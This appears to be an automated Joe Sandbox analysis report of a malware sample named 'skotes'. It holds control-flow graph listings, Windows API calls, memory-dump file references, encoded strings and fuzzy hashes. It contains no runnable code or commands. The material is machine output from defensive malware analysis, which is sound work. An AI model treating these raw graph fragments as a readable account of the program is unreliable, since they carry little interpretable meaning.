                                                                                                                                                                                                                                                control_flow_graph 1316 4b7d30-4b7db2 call 4e40f0 1320 4b7db8-4b7de0 call 4c7a00 call 4b5c10 1316->1320 1321 4b8356-4b8373 call 4ccff1 1316->1321 1328 4b7de2 1320->1328 1329 4b7de4-4b7e06 call 4c7a00 call 4b5c10 1320->1329 1328->1329 1334 4b7e0a-4b7e23 1329->1334 1335 4b7e08 1329->1335 1338 4b7e25-4b7e34 1334->1338 1339 4b7e54-4b7e7f 1334->1339 1335->1334 1340 4b7e4a-4b7e51 call 4cd663 1338->1340 1341 4b7e36-4b7e44 1338->1341 1342 4b7e81-4b7e90 1339->1342 1343 4b7eb0-4b7ed1 1339->1343 1340->1339 1341->1340 1344 4b8374 call 4e6c6a 1341->1344 1346 4b7e92-4b7ea0 1342->1346 1347 4b7ea6-4b7ead call 4cd663 1342->1347 1348 4b7ed3-4b7ed5 GetNativeSystemInfo 1343->1348 1349 4b7ed7-4b7edc 1343->1349 1356 4b8379-4b837f call 4e6c6a 1344->1356 1346->1344 1346->1347 1347->1343 1353 4b7edd-4b7ee6 1348->1353 1349->1353 1354 4b7ee8-4b7eef 1353->1354 1355 4b7f04-4b7f07 1353->1355 1359 4b8351 1354->1359 1360 4b7ef5-4b7eff 1354->1360 1361 4b7f0d-4b7f16 1355->1361 1362 4b82f7-4b82fa 1355->1362 1359->1321 1364 4b834c 1360->1364 1365 4b7f29-4b7f2c 1361->1365 1366 4b7f18-4b7f24 1361->1366 1362->1359 1367 4b82fc-4b8305 1362->1367 1364->1359 1369 4b7f32-4b7f39 1365->1369 1370 4b82d4-4b82d6 1365->1370 1366->1364 1371 4b832c-4b832f 1367->1371 1372 4b8307-4b830b 1367->1372 1375 4b8019-4b82bd call 4c7a00 call 4b5c10 call 4c7a00 call 4b5c10 call 4b5d50 call 4c7a00 call 4b5c10 call 4b5730 call 4c7a00 call 4b5c10 call 4c7a00 call 4b5c10 call 4b5d50 call 4c7a00 call 4b5c10 call 4b5730 call 4c7a00 call 4b5c10 call 4c7a00 call 4b5c10 call 4b5d50 call 4c7a00 call 4b5c10 call 4b5730 call 4c7a00 call 4b5c10 call 4c7a00 call 4b5c10 call 4b5d50 call 4c7a00 call 4b5c10 call 4b5730 1369->1375 1376 4b7f3f-4b7f9b call 4c7a00 call 4b5c10 call 4c7a00 call 4b5c10 call 4b5d50 1369->1376 1373 4b82d8-4b82e2 1370->1373 1374 4b82e4-4b82e7 1370->1374 1379 4b833d-4b8349 1371->1379 1380 4b8331-4b833b 1371->1380 1377 4b830d-4b8312 1372->1377 1378 4b8320-4b832a 1372->1378 1373->1364 1374->1359 1381 4b82e9-4b82f5 1374->1381 1416 4b82c3-4b82cc 1375->1416 1401 4b7fa0-4b7fa7 1376->1401 1377->1378 1383 4b8314-4b831e 1377->1383 1378->1359 1379->1364 1380->1359 1381->1364 1383->1359 1403 4b7fab-4b7fcb call 4e8bbe 1401->1403 1404 4b7fa9 1401->1404 1410 4b7fcd-4b7fdc 1403->1410 1411 4b8002-4b8004 1403->1411 1404->1403 1413 4b7fde-4b7fec 1410->1413 1414 4b7ff2-4b7fff call 4cd663 1410->1414 1415 4b800a-4b8014 1411->1415 1411->1416 1413->1356 1413->1414 1414->1411 1415->1416 1416->1362 1420 4b82ce 1416->1420 1420->1370
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 004B7ED3
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                                                                                                • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
                                                                                                                                                                                                                                                • API String ID: 1721193555-3123340372
                                                                                                                                                                                                                                                • Opcode ID: b038a6a2e17b2ae98bfacd6373b073d28f9b6580d4537acbc36d6ea2abad9f2b
                                                                                                                                                                                                                                                • Instruction ID: 60b8fdfbef087b1547c07792006f123a6eb3de80c2d72af21f7fb07eb60c64ff
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b038a6a2e17b2ae98bfacd6373b073d28f9b6580d4537acbc36d6ea2abad9f2b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9CE14970E002049BDF15BB29CC0B7DE7B71AB41724F94428EE815673C2DB394E958BEA

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1647 4b8380-4b8401 call 4e40f0 1651 4b840d-4b8435 call 4c7a00 call 4b5c10 1647->1651 1652 4b8403-4b8408 1647->1652 1660 4b8439-4b845b call 4c7a00 call 4b5c10 1651->1660 1661 4b8437 1651->1661 1653 4b854f-4b856b call 4ccff1 1652->1653 1666 4b845f-4b8478 1660->1666 1667 4b845d 1660->1667 1661->1660 1670 4b847a-4b8489 1666->1670 1671 4b84a9-4b84d4 1666->1671 1667->1666 1672 4b848b-4b8499 1670->1672 1673 4b849f-4b84a6 call 4cd663 1670->1673 1674 4b8501-4b8522 1671->1674 1675 4b84d6-4b84e5 1671->1675 1672->1673 1678 4b856c-4b8571 call 4e6c6a 1672->1678 1673->1671 1676 4b8528-4b852d 1674->1676 1677 4b8524-4b8526 GetNativeSystemInfo 1674->1677 1680 4b84f7-4b84fe call 4cd663 1675->1680 1681 4b84e7-4b84f5 1675->1681 1682 4b852e-4b8535 1676->1682 1677->1682 1680->1674 1681->1678 1681->1680 1682->1653 1687 4b8537-4b853f 1682->1687 1690 4b8548-4b854b 1687->1690 1691 4b8541-4b8546 1687->1691 1690->1653 1692 4b854d 1690->1692 1691->1653 1692->1653
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 004B8524
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1721193555-0
                                                                                                                                                                                                                                                • Opcode ID: 969db85d56af81d038e2ae38b3ac8fdaaa83bcfd47647968ddcd855bf78d5cc9
                                                                                                                                                                                                                                                • Instruction ID: ee7640b52ce85442c373c6a4f301d33ec875b975565ffa5b10b2fd2440009b44
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 969db85d56af81d038e2ae38b3ac8fdaaa83bcfd47647968ddcd855bf78d5cc9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4512A70D102589BDB24EB68CD49BDDB779EB45314F5042AEE404A72C1EF389E80CB69

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1693 4eb04b-4eb057 1694 4eb089-4eb094 call 4e75f6 1693->1694 1695 4eb059-4eb05b 1693->1695 1703 4eb096-4eb098 1694->1703 1696 4eb05d-4eb05e 1695->1696 1697 4eb074-4eb085 RtlAllocateHeap 1695->1697 1696->1697 1699 4eb087 1697->1699 1700 4eb060-4eb067 call 4e9dc0 1697->1700 1699->1703 1700->1694 1705 4eb069-4eb072 call 4e8e36 1700->1705 1705->1694 1705->1697
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,23D40EA9,?,?,004CD3FC,23D40EA9,?,004C7A8B,?,?,?,?,?,?,004B7465,?), ref: 004EB07E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                • Opcode ID: 9a828d4ecfbc998848819ddab5db05b81308a42d53b090b6e137c6dd0144517e
                                                                                                                                                                                                                                                • Instruction ID: 98ba0e6f62c066758020e3170f4745644fc0fbac1378357f64dbcf4613602c05
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a828d4ecfbc998848819ddab5db05b81308a42d53b090b6e137c6dd0144517e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ECE065351412A696DA3133674C41B6BA648DF413B3F151217AD6896290DB28ED0181ED

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                                • Opcode ID: e01504c4bf2c071a09fa8b1b509aa22d6aa14f3fe25d266b39545810e7869d2c
                                                                                                                                                                                                                                                • Instruction ID: 40a07247cc094139f328c9021a3a4c5d31654dcdfd7b4ac73230ff1a87071e9f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e01504c4bf2c071a09fa8b1b509aa22d6aa14f3fe25d266b39545810e7869d2c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03F0F475A00604ABCB01BB6A8D07B5EBF75EB06764F80435DE821672D1DB381A1447D7
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2955536017.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_5360000_skotes.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 60a8ea6411e736527aa08038d6adb5b544f5d87b7675eb4070e8bd2b991e8daa
                                                                                                                                                                                                                                                • Instruction ID: 221741fa479d96429df0f02e7481da07d54b5028ce0e520db5474d078daaaaf9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60a8ea6411e736527aa08038d6adb5b544f5d87b7675eb4070e8bd2b991e8daa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D601DFEB1890107EA142C6816B49AFA7B6EFAC7B70330C42EF406C6509F2D45E0A2131
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2955536017.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_5360000_skotes.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 23ad68c40324769d968e98a2b756e45dca5d03c41e437234a968f235eb629f91
                                                                                                                                                                                                                                                • Instruction ID: 3da2d832d6d5a3da1e918fca0be5fabe59e833beb82581bde3a5cacfaa0b3c66
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23ad68c40324769d968e98a2b756e45dca5d03c41e437234a968f235eb629f91
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5EF0F4EB58D0202EA106E591775E5FA6B1EF9C7730334C82FF042CA419F5868E4B91B8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2955536017.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_5360000_skotes.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: fb78bfaa66a9f4bb69f3b88d0fa6eabc2728e2830c655f2e5bac0f20892eb0d6
                                                                                                                                                                                                                                                • Instruction ID: d7cd1d2ff1af3b2403632ff4977924316b37422c0aa494834505176dce2d80a2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb78bfaa66a9f4bb69f3b88d0fa6eabc2728e2830c655f2e5bac0f20892eb0d6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C01F2FB1891107EA102C6816B9AAFA772DFAC7770330C42EF402C6505E2945E0E5230
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2955536017.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_5360000_skotes.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 92427b8ad61c6dbf6b00350ec1b2aba689622715e6a7db38ccc8256a44d17eb8
                                                                                                                                                                                                                                                • Instruction ID: 35bfbe7daa03e7dcf3784c64a0e92b1d2ebe6ec0defa2a49caedca64c99aef20
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92427b8ad61c6dbf6b00350ec1b2aba689622715e6a7db38ccc8256a44d17eb8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16F046FB58D0107EB146CA916B49AFA772DFAC6B30334C83EF402C6409F1984E0A1574
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2955536017.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_5360000_skotes.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5996a640236e9fdbe0f4941c44af529d8a6b324d935d44e4902ee2f3b9d72781
                                                                                                                                                                                                                                                • Instruction ID: c698616a22153091aa2104385caf3af4c2991a547b33ba084407483c4f9252f9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5996a640236e9fdbe0f4941c44af529d8a6b324d935d44e4902ee2f3b9d72781
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29F082FB58E1107EB102C6916B5AABE671DFAC6670330C42EF406D2409F5944E4A5175
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2955536017.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_5360000_skotes.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 39ce66e6cc146a05cd27cc5459b58bbcc82e9eec6e01db3d003bf9d178e26707
                                                                                                                                                                                                                                                • Instruction ID: 4a5aa6d5e47dd9a0c0c94365243394755f7fae7c02e4699fd6438cadd4e4dc58
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39ce66e6cc146a05cd27cc5459b58bbcc82e9eec6e01db3d003bf9d178e26707
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7F09E7B64D4202F660BD9F1954F5BA3F09E986671334C85ED041C701CF9548D0B81A8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2955536017.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_5360000_skotes.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8114feeefd33ce12247ce8f5440b780dafcacac8405ef64a05540f19dfed1369
                                                                                                                                                                                                                                                • Instruction ID: f8ba988fd7649221a96bc621604524fcf4dc6a0a3468c5168e4eba912291c2f7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8114feeefd33ce12247ce8f5440b780dafcacac8405ef64a05540f19dfed1369
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FE0D8AB98C5202EB102D491669A6B9670EFAC6571335942AF40286019F5494D0A55B5
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __floor_pentium4
                                                                                                                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                • Opcode ID: 04355872ffb429b3c0c42152eb15fe26db30e4a3feb13ad2c05177c5885175ea
                                                                                                                                                                                                                                                • Instruction ID: e7ad09c8799e55715a881f5c01d0f6a4f6982c7d5709607967e4c68a7d9424c8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04355872ffb429b3c0c42152eb15fe26db30e4a3feb13ad2c05177c5885175ea
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53C23A71E0462C8FDB25CE28DD407AAB3B5EB88345F1541EBDA4DE7240E778AE818F45
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
